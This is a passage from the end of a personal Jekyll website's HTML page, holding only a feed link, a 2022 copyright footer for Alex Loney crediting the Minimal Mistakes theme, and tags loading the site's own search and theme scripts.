      <li><a href="/feed.xml"><i class="fas fa-fw fa-rss-square" aria-hidden="true"></i> Feed</a></li>
    
  </ul>
</div>

<div class="page__footer-copyright">© 2022 Alex Loney. Powered by <a href="https://jekyllrb.com" rel="nofollow">Jekyll</a> &amp; <a href="https://mademistakes.com/work/minimal-mistakes-jekyll-theme/" rel="nofollow">Minimal Mistakes</a>.</div>

      </footer>
    </div>

    
  <script src="/assets/js/main.min.js"></script>




<script src="/assets/js/lunr/lunr.min.js"></script>
<script src="/assets/js/lunr/lunr-store.js"></script>
<script src="/assets/js/lunr/lunr-en.js"></script>







  </body>
</html>
